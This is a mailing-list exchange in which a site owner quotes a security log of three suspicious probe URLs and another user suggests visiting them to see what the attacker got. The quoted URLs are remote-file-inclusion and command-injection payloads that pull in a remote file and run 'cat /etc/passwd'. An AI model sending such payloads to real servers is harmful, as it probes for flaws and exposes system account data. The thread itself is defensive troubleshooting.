When you go to those URLs on your website, what output do you get? That will likely tell you what output the attacker got.
- Y Sent from a gizmo with a very small keyboard and hyperactive autocorrect. On Feb 12, 2014 10:58 AM, "Knute Johnson" <[email protected]> wrote: > I found the following in my log this morning. Does anybody know what it > really means? Thanks. > > A total of 3 possible successful probes were detected (the following URLs > contain strings that match one or more of a listing of strings that > indicate a possible exploit): > > > /user.php?caselist[bad_file.txt][path]=http://www.google. > com/humans.txt?&command=cat%20/etc/passwd HTTP Response 302 > > /sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=http://www.google.com/humans.txt? > HTTP Response 302 > > /gepi/gestion/savebackup.php?filename=http://www.google. > com/humans.txt?&cmd=cat/etc/passwd HTTP Response 302 > > > -- > > Knute Johnson > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > >
